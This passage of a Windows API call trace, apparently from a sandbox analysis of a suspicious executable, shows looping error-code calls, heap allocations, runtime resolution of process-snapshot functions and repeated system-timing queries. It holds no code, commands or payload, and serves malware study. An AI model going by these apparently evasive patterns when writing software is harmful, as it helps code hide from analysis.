returned 0x0 [0178.408] SetLastError (dwErrCode=0x0) [0178.408] GetLastError () returned 0x0 [0178.408] SetLastError (dwErrCode=0x0) [0178.408] GetLastError () returned 0x0 [0178.408] SetLastError (dwErrCode=0x0) [0178.408] GetLastError () returned 0x0 [0178.408] SetLastError (dwErrCode=0x0) [0178.408] GetLastError () returned 0x0 [0178.409] SetLastError (dwErrCode=0x0) [0178.409] GetLastError () returned 0x0 [0178.409] SetLastError (dwErrCode=0x0) [0178.409] GetLastError () returned 0x0 [0178.409] SetLastError (dwErrCode=0x0) [0178.409] GetLastError () returned 0x0 [0178.409] SetLastError (dwErrCode=0x0) [0178.409] GetLastError () returned 0x0 [0178.410] SetLastError (dwErrCode=0x0) [0178.410] GetLastError () returned 0x0 [0178.411] SetLastError (dwErrCode=0x0) [0178.411] GetLastError () returned 0x0 [0178.411] SetLastError (dwErrCode=0x0) [0178.411] GetLastError () returned 0x0 [0178.411] SetLastError (dwErrCode=0x0) [0178.411] GetLastError () returned 0x0 [0178.411] SetLastError (dwErrCode=0x0) [0178.411] GetLastError () returned 0x0 [0178.411] SetLastError (dwErrCode=0x0) [0178.411] GetLastError () returned 0x0 [0178.411] SetLastError (dwErrCode=0x0) [0178.411] GetLastError () returned 0x0 [0178.411] SetLastError (dwErrCode=0x0) [0178.411] GetLastError () returned 0x0 [0178.412] SetLastError (dwErrCode=0x0) [0178.412] GetLastError () returned 0x0 [0178.412] SetLastError (dwErrCode=0x0) [0178.412] GetLastError () returned 0x0 [0178.412] SetLastError (dwErrCode=0x0) [0178.412] GetLastError () returned 0x0 [0178.412] SetLastError (dwErrCode=0x0) [0178.413] GetLastError () returned 0x0 [0178.413] SetLastError (dwErrCode=0x0) [0178.413] GetLastError () returned 0x0 [0178.413] SetLastError (dwErrCode=0x0) [0178.413] GetLastError () returned 0x0 [0178.413] SetLastError (dwErrCode=0x0) [0178.413] GetLastError () returned 0x0 [0178.413] SetLastError (dwErrCode=0x0) [0178.413] GetLastError () returned 0x0 [0178.413] SetLastError (dwErrCode=0x0) [0178.413] GetLastError () returned 0x0 [0178.413] SetLastError (dwErrCode=0x0) [0178.413] GetLastError () returned 0x0 [0178.414] SetLastError (dwErrCode=0x0) [0178.414] GetLastError () returned 0x0 [0178.414] SetLastError (dwErrCode=0x0) [0178.414] GetLastError () returned 0x0 [0178.414] SetLastError (dwErrCode=0x0) [0178.414] GetLastError () returned 0x0 [0178.414] SetLastError (dwErrCode=0x0) [0178.414] GetLastError () returned 0x0 [0178.414] SetLastError (dwErrCode=0x0) [0178.414] GetLastError () returned 0x0 [0178.414] SetLastError (dwErrCode=0x0) [0178.414] GetLastError () returned 0x0 [0178.414] SetLastError (dwErrCode=0x0) [0178.414] GetLastError () returned 0x0 [0178.415] SetLastError (dwErrCode=0x0) [0178.415] GetLastError () returned 0x0 [0178.415] SetLastError (dwErrCode=0x0) [0178.415] GetLastError () returned 0x0 [0178.415] SetLastError (dwErrCode=0x0) [0178.415] GetLastError () returned 0x0 [0178.415] SetLastError (dwErrCode=0x0) [0178.415] GetLastError () returned 0x0 [0178.415] SetLastError (dwErrCode=0x0) [0178.415] GetLastError () returned 0x0 [0178.415] SetLastError (dwErrCode=0x0) [0178.415] GetLastError () returned 0x0 [0178.415] SetLastError (dwErrCode=0x0) [0178.415] GetLastError () returned 0x0 [0178.415] SetLastError (dwErrCode=0x0) [0178.416] GetLastError () returned 0x0 [0178.416] SetLastError (dwErrCode=0x0) [0178.416] GetLastError () returned 0x0 [0178.416] SetLastError (dwErrCode=0x0) [0178.416] GetLastError () returned 0x0 [0178.416] SetLastError (dwErrCode=0x0) [0178.416] GetLastError () returned 0x0 [0178.416] SetLastError (dwErrCode=0x0) [0178.416] GetLastError () returned 0x0 [0178.416] SetLastError (dwErrCode=0x0) [0178.416] GetLastError () returned 0x0 [0178.416] SetLastError (dwErrCode=0x0) [0178.416] GetLastError () returned 0x0 [0178.416] SetLastError (dwErrCode=0x0) [0178.416] GetLastError () returned 0x0 [0178.417] SetLastError (dwErrCode=0x0) [0178.417] GetLastError () returned 0x0 [0178.417] SetLastError (dwErrCode=0x0) [0178.417] GetLastError () returned 0x0 [0178.417] SetLastError (dwErrCode=0x0) [0178.417] GetLastError () returned 0x0 [0178.417] SetLastError (dwErrCode=0x0) [0178.417] GetLastError () returned 0x0 [0178.417] SetLastError (dwErrCode=0x0) [0178.417] GetLastError () returned 0x0 [0178.417] SetLastError (dwErrCode=0x0) [0178.417] GetLastError () returned 0x0 [0178.417] SetLastError (dwErrCode=0x0) [0178.417] GetLastError () returned 0x0 [0178.417] SetLastError (dwErrCode=0x0) [0178.417] GetLastError () returned 0x0 [0178.418] SetLastError (dwErrCode=0x0) [0178.418] GetLastError () returned 0x0 [0178.418] SetLastError (dwErrCode=0x0) [0178.418] GetLastError () returned 0x0 [0178.418] SetLastError (dwErrCode=0x0) [0178.418] GetLastError () returned 0x0 [0178.418] SetLastError (dwErrCode=0x0) [0178.418] GetLastError () returned 0x0 [0178.418] SetLastError (dwErrCode=0x0) [0178.418] GetLastError () returned 0x0 [0178.418] SetLastError (dwErrCode=0x0) [0178.418] GetLastError () returned 0x0 [0178.418] SetLastError (dwErrCode=0x0) [0178.418] GetLastError () returned 0x0 [0178.419] SetLastError (dwErrCode=0x0) [0178.419] GetLastError () returned 0x0 [0178.419] SetLastError (dwErrCode=0x0) [0178.419] GetLastError () returned 0x0 [0178.419] SetLastError (dwErrCode=0x0) [0178.419] GetLastError () returned 0x0 [0178.419] SetLastError (dwErrCode=0x0) [0178.419] GetLastError () returned 0x0 [0178.419] SetLastError (dwErrCode=0x0) [0178.419] GetLastError () returned 0x0 [0178.419] SetLastError (dwErrCode=0x0) [0178.419] GetLastError () returned 0x0 [0178.419] SetLastError (dwErrCode=0x0) [0178.420] GetLastError () returned 0x0 [0178.420] SetLastError (dwErrCode=0x0) [0178.420] GetLastError () returned 0x0 [0178.420] SetLastError (dwErrCode=0x0) [0178.420] GetLastError () returned 0x0 [0178.420] SetLastError (dwErrCode=0x0) [0178.420] GetLastError () returned 0x0 [0178.420] SetLastError (dwErrCode=0x0) [0178.420] GetLastError () returned 0x0 [0178.420] SetLastError (dwErrCode=0x0) [0178.420] GetLastError () returned 0x0 [0178.421] SetLastError (dwErrCode=0x0) [0178.421] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x68) returned 0x261990 [0178.421] GetLastError () returned 0x0 [0178.421] SetLastError (dwErrCode=0x0) [0178.421] GetLastError () returned 0x0 [0178.421] SetLastError (dwErrCode=0x0) [0178.421] GetLastError () returned 0x0 [0178.421] SetLastError (dwErrCode=0x0) [0178.421] GetLastError () returned 0x0 [0178.421] SetLastError (dwErrCode=0x0) [0178.421] GetLastError () returned 0x0 [0178.421] SetLastError (dwErrCode=0x0) [0178.421] GetLastError () returned 0x0 [0178.422] SetLastError (dwErrCode=0x0) [0178.422] GetLastError () returned 0x0 [0178.422] SetLastError (dwErrCode=0x0) [0178.422] GetLastError () returned 0x0 [0178.422] SetLastError (dwErrCode=0x0) [0178.422] GetLastError () returned 0x0 [0178.422] SetLastError (dwErrCode=0x0) [0178.422] GetLastError () returned 0x0 [0178.422] SetLastError (dwErrCode=0x0) [0178.422] GetLastError () returned 0x0 [0178.422] SetLastError (dwErrCode=0x0) [0178.422] GetLastError () returned 0x0 [0178.422] SetLastError (dwErrCode=0x0) [0178.422] GetLastError () returned 0x0 [0178.422] SetLastError (dwErrCode=0x0) [0178.423] GetLastError () returned 0x0 [0178.423] SetLastError (dwErrCode=0x0) [0178.423] GetLastError () returned 0x0 [0178.423] SetLastError (dwErrCode=0x0) [0178.423] GetLastError () returned 0x0 [0178.423] SetLastError (dwErrCode=0x0) [0178.423] GetLastError () returned 0x0 [0178.423] SetLastError (dwErrCode=0x0) [0178.423] GetLastError () returned 0x0 [0178.423] SetLastError (dwErrCode=0x0) [0178.423] GetLastError () returned 0x0 [0178.423] SetLastError (dwErrCode=0x0) [0178.424] GetLastError () returned 0x0 [0178.424] SetLastError (dwErrCode=0x0) [0178.424] GetLastError () returned 0x0 [0178.424] SetLastError (dwErrCode=0x0) [0178.424] GetLastError () returned 0x0 [0178.424] SetLastError (dwErrCode=0x0) [0178.424] GetLastError () returned 0x0 [0178.424] SetLastError (dwErrCode=0x0) [0178.424] GetLastError () returned 0x0 [0178.424] SetLastError (dwErrCode=0x0) [0178.424] GetLastError () returned 0x0 [0178.424] SetLastError (dwErrCode=0x0) [0178.424] GetLastError () returned 0x0 [0178.425] SetLastError (dwErrCode=0x0) [0178.425] GetLastError () returned 0x0 [0178.425] SetLastError (dwErrCode=0x0) [0178.425] GetLastError () returned 0x0 [0178.425] SetLastError (dwErrCode=0x0) [0178.425] GetLastError () returned 0x0 [0178.425] SetLastError (dwErrCode=0x0) [0178.425] GetLastError () returned 0x0 [0178.425] SetLastError (dwErrCode=0x0) [0178.425] GetLastError () returned 0x0 [0178.425] SetLastError (dwErrCode=0x0) [0178.425] GetLastError () returned 0x0 [0178.426] SetLastError (dwErrCode=0x0) [0178.426] GetLastError () returned 0x0 [0178.426] SetLastError (dwErrCode=0x0) [0178.426] GetLastError () returned 0x0 [0178.426] SetLastError (dwErrCode=0x0) [0178.426] GetLastError () returned 0x0 [0178.426] SetLastError (dwErrCode=0x0) [0178.426] GetLastError () returned 0x0 [0178.426] SetLastError (dwErrCode=0x0) [0178.426] GetLastError () returned 0x0 [0178.426] SetLastError (dwErrCode=0x0) [0178.426] GetLastError () returned 0x0 [0178.426] SetLastError (dwErrCode=0x0) [0178.426] GetLastError () returned 0x0 [0178.427] SetLastError (dwErrCode=0x0) [0178.427] GetLastError () returned 0x0 [0178.427] SetLastError (dwErrCode=0x0) [0178.427] GetLastError () returned 0x0 [0178.427] SetLastError (dwErrCode=0x0) [0178.427] GetLastError () returned 0x0 [0178.427] SetLastError (dwErrCode=0x0) [0178.427] GetLastError () returned 0x0 [0178.427] SetLastError (dwErrCode=0x0) [0178.427] GetLastError () returned 0x0 [0178.427] SetLastError (dwErrCode=0x0) [0178.427] GetLastError () returned 0x0 [0178.427] SetLastError (dwErrCode=0x0) [0178.427] GetLastError () returned 0x0 [0178.427] SetLastError (dwErrCode=0x0) [0178.427] GetLastError () returned 0x0 [0178.428] SetLastError (dwErrCode=0x0) [0178.461] GetLastError () returned 0x0 [0178.461] SetLastError (dwErrCode=0x0) [0178.461] GetLastError () returned 0x0 [0178.461] SetLastError (dwErrCode=0x0) [0178.461] GetLastError () returned 0x0 [0178.461] SetLastError (dwErrCode=0x0) [0178.461] GetLastError () returned 0x0 [0178.461] SetLastError (dwErrCode=0x0) [0178.462] GetLastError () returned 0x0 [0178.462] SetLastError (dwErrCode=0x0) [0178.462] GetLastError () returned 0x0 [0178.462] SetLastError (dwErrCode=0x0) [0178.462] GetLastError () returned 0x0 [0178.462] SetLastError (dwErrCode=0x0) [0178.462] GetLastError () returned 0x0 [0178.462] SetLastError (dwErrCode=0x0) [0178.462] GetLastError () returned 0x0 [0178.462] SetLastError (dwErrCode=0x0) [0178.462] GetLastError () returned 0x0 [0178.462] SetLastError (dwErrCode=0x0) [0178.462] GetLastError () returned 0x0 [0178.462] SetLastError (dwErrCode=0x0) [0178.463] GetLastError () returned 0x0 [0178.463] SetLastError (dwErrCode=0x0) [0178.463] GetLastError () returned 0x0 [0178.463] SetLastError (dwErrCode=0x0) [0178.463] GetLastError () returned 0x0 [0178.463] SetLastError (dwErrCode=0x0) [0178.463] GetLastError () returned 0x0 [0178.463] SetLastError (dwErrCode=0x0) [0178.463] GetLastError () returned 0x0 [0178.463] SetLastError (dwErrCode=0x0) [0178.463] GetLastError () returned 0x0 [0178.463] SetLastError (dwErrCode=0x0) [0178.463] GetLastError () returned 0x0 [0178.463] SetLastError (dwErrCode=0x0) [0178.463] GetLastError () returned 0x0 [0178.464] SetLastError (dwErrCode=0x0) [0178.464] GetLastError () returned 0x0 [0178.464] SetLastError (dwErrCode=0x0) [0178.464] GetLastError () returned 0x0 [0178.464] SetLastError (dwErrCode=0x0) [0178.464] GetLastError () returned 0x0 [0178.464] SetLastError (dwErrCode=0x0) [0178.464] GetLastError () returned 0x0 [0178.464] SetLastError (dwErrCode=0x0) [0178.464] GetLastError () returned 0x0 [0178.464] SetLastError (dwErrCode=0x0) [0178.464] GetLastError () returned 0x0 [0178.464] SetLastError (dwErrCode=0x0) [0178.464] GetLastError () returned 0x0 [0178.465] SetLastError (dwErrCode=0x0) [0178.465] GetLastError () returned 0x0 [0178.465] SetLastError (dwErrCode=0x0) [0178.465] GetLastError () returned 0x0 [0178.465] SetLastError (dwErrCode=0x0) [0178.465] GetLastError () returned 0x0 [0178.465] SetLastError (dwErrCode=0x0) [0178.465] GetLastError () returned 0x0 [0178.465] SetLastError (dwErrCode=0x0) [0178.465] GetLastError () returned 0x0 [0178.465] SetLastError (dwErrCode=0x0) [0178.465] GetLastError () returned 0x0 [0178.465] SetLastError (dwErrCode=0x0) [0178.465] GetLastError () returned 0x0 [0178.466] SetLastError (dwErrCode=0x0) [0178.466] GetLastError () returned 0x0 [0178.466] SetLastError (dwErrCode=0x0) [0178.466] GetLastError () returned 0x0 [0178.466] SetLastError (dwErrCode=0x0) [0178.466] GetLastError () returned 0x0 [0178.466] SetLastError (dwErrCode=0x0) [0178.466] GetLastError () returned 0x0 [0178.466] SetLastError (dwErrCode=0x0) [0178.466] GetLastError () returned 0x0 [0178.466] SetLastError (dwErrCode=0x0) [0178.466] GetLastError () returned 0x0 [0178.467] SetLastError (dwErrCode=0x0) [0178.467] GetLastError () returned 0x0 [0178.467] SetLastError (dwErrCode=0x0) [0178.467] GetLastError () returned 0x0 [0178.467] SetLastError (dwErrCode=0x0) [0178.467] GetLastError () returned 0x0 [0178.467] SetLastError (dwErrCode=0x0) [0178.467] GetLastError () returned 0x0 [0178.467] SetLastError (dwErrCode=0x0) [0178.467] GetLastError () returned 0x0 [0178.467] SetLastError (dwErrCode=0x0) [0178.467] GetLastError () returned 0x0 [0178.467] SetLastError (dwErrCode=0x0) [0178.467] GetLastError () returned 0x0 [0178.467] SetLastError (dwErrCode=0x0) [0178.467] GetLastError () returned 0x0 [0178.468] SetLastError (dwErrCode=0x0) [0178.468] GetLastError () returned 0x0 [0178.468] SetLastError (dwErrCode=0x0) [0178.468] GetLastError () returned 0x0 [0178.468] SetLastError (dwErrCode=0x0) [0178.468] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x98) returned 0x261a00 [0178.468] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1f) returned 0x261aa0 [0178.468] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x36) returned 0x261ac8 [0178.468] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x37) returned 0x261b08 [0178.468] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3c) returned 0x261b48 [0178.468] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x31) returned 0x261b90 [0178.468] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x17) returned 0x261bd0 [0178.468] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x24) returned 0x261bf0 [0178.468] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x14) returned 0x261c20 [0178.468] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xd) returned 0x261c40 [0178.468] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x25) returned 0x261c58 [0178.468] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x39) returned 0x261c88 [0178.468] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x18) returned 0x261cd0 [0178.469] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x17) returned 0x261cf0 [0178.469] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xe) returned 0x261d10 [0178.469] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x69) returned 0x261d28 [0178.469] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3e) returned 0x261da0 [0178.469] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1b) returned 0x261de8 [0178.469] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1d) returned 0x261e10 [0178.469] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x48) returned 0x261e38 [0178.469] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x12) returned 0x261e88 [0178.469] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x18) returned 0x261ea8 [0178.469] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1b) returned 0x261ec8 [0178.469] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x24) returned 0x261ef0 [0178.469] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x29) returned 0x261f20 [0178.469] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1e) returned 0x261f58 [0178.469] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x41) returned 0x261f80 [0178.469] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x17) returned 0x261fd0 [0178.470] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xf) returned 0x261ff0 [0178.470] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x16) returned 0x262008 [0178.470] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2a) returned 0x262028 [0178.470] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x29) returned 0x262060 [0178.470] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x15) returned 0x262098 [0178.470] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1e) returned 0x2620b8 [0178.470] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2a) returned 0x2620e0 [0178.470] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x12) returned 0x262118 [0178.470] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x18) returned 0x262138 [0178.470] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x46) returned 0x262158 [0178.470] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2611f8 | out: hHeap=0x260000) returned 1 [0178.472] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x800) returned 0x2621a8 [0178.472] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x80) returned 0x2611f8 [0178.472] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e49) returned 0x0 [0178.473] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x2611f8) returned 0x80 [0178.473] GetLastError () returned 0x0 [0178.473] SetLastError (dwErrCode=0x0) [0178.473] GetLastError () returned 0x0 [0178.473] SetLastError (dwErrCode=0x0) [0178.473] GetLastError () returned 0x0 [0178.473] SetLastError (dwErrCode=0x0) [0178.473] GetLastError () returned 0x0 [0178.474] SetLastError (dwErrCode=0x0) [0178.474] GetLastError () returned 0x0 [0178.474] SetLastError (dwErrCode=0x0) [0178.474] GetLastError () returned 0x0 [0178.474] SetLastError (dwErrCode=0x0) [0178.474] GetLastError () returned 0x0 [0178.474] SetLastError (dwErrCode=0x0) [0178.474] GetLastError () returned 0x0 [0178.474] SetLastError (dwErrCode=0x0) [0178.474] GetLastError () returned 0x0 [0178.474] SetLastError (dwErrCode=0x0) [0178.474] GetLastError () returned 0x0 [0178.474] SetLastError (dwErrCode=0x0) [0178.474] GetLastError () returned 0x0 [0178.475] SetLastError (dwErrCode=0x0) [0178.475] GetLastError () returned 0x0 [0178.475] SetLastError (dwErrCode=0x0) [0178.475] GetLastError () returned 0x0 [0178.475] SetLastError (dwErrCode=0x0) [0178.475] GetLastError () returned 0x0 [0178.475] SetLastError (dwErrCode=0x0) [0178.475] GetLastError () returned 0x0 [0178.475] SetLastError (dwErrCode=0x0) [0178.475] GetLastError () returned 0x0 [0178.475] SetLastError (dwErrCode=0x0) [0178.475] GetLastError () returned 0x0 [0178.475] SetLastError (dwErrCode=0x0) [0178.475] GetLastError () returned 0x0 [0178.475] SetLastError (dwErrCode=0x0) [0178.475] GetLastError () returned 0x0 [0178.476] SetLastError (dwErrCode=0x0) [0178.476] GetLastError () returned 0x0 [0178.476] SetLastError (dwErrCode=0x0) [0178.476] GetLastError () returned 0x0 [0178.476] SetLastError (dwErrCode=0x0) [0178.476] GetLastError () returned 0x0 [0178.476] SetLastError (dwErrCode=0x0) [0178.476] GetLastError () returned 0x0 [0178.476] SetLastError (dwErrCode=0x0) [0178.476] GetLastError () returned 0x0 [0178.476] SetLastError (dwErrCode=0x0) [0178.476] GetLastError () returned 0x0 [0178.476] SetLastError (dwErrCode=0x0) [0178.476] GetLastError () returned 0x0 [0178.476] SetLastError (dwErrCode=0x0) [0178.476] GetLastError () returned 0x0 [0178.476] SetLastError (dwErrCode=0x0) [0178.477] GetLastError () returned 0x0 [0178.477] SetLastError (dwErrCode=0x0) [0178.477] GetLastError () returned 0x0 [0178.477] SetLastError (dwErrCode=0x0) [0178.477] GetLastError () returned 0x0 [0178.477] SetLastError (dwErrCode=0x0) [0178.477] GetLastError () returned 0x0 [0178.477] SetLastError (dwErrCode=0x0) [0178.477] GetLastError () returned 0x0 [0178.477] SetLastError (dwErrCode=0x0) [0178.477] GetLastError () returned 0x0 [0178.477] SetLastError (dwErrCode=0x0) [0178.477] GetLastError () returned 0x0 [0178.477] SetLastError (dwErrCode=0x0) [0178.477] GetLastError () returned 0x0 [0178.477] SetLastError (dwErrCode=0x0) [0178.477] GetLastError () returned 0x0 [0178.478] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0178.478] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0178.479] GetProcAddress (hModule=0x76d30000, lpProcName="Module32FirstW") returned 0x76d679f9 [0178.479] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0178.481] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0178.482] PeekMessageA (in: lpMsg=0x18fa44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa44) returned 0 [0178.482] GetTickCount () returned 0x115647e [0178.482] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.482] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.482] GetACP () returned 0x4e4 [0178.482] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.482] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.482] GetACP () returned 0x4e4 [0178.482] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.482] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.482] GetACP () returned 0x4e4 [0178.482] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.483] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.483] GetACP () returned 0x4e4 [0178.483] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.483] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.483] GetACP () returned 0x4e4 [0178.483] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.483] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.483] GetACP () returned 0x4e4 [0178.483] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.483] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.483] GetACP () returned 0x4e4 [0178.483] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.483] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.483] GetACP () returned 0x4e4 [0178.483] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.483] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.483] GetACP () returned 0x4e4 [0178.483] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.484] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.484] GetACP () returned 0x4e4 [0178.484] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.484] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.484] GetACP () returned 0x4e4 [0178.484] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.484] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.484] GetACP () returned 0x4e4 [0178.484] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.484] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.484] GetACP () returned 0x4e4 [0178.484] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.484] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.484] GetACP () returned 0x4e4 [0178.484] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.484] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.484] GetACP () returned 0x4e4 [0178.484] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.484] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.485] GetACP () returned 0x4e4 [0178.485] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.485] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.485] GetACP () returned 0x4e4 [0178.485] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.485] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.485] GetACP () returned 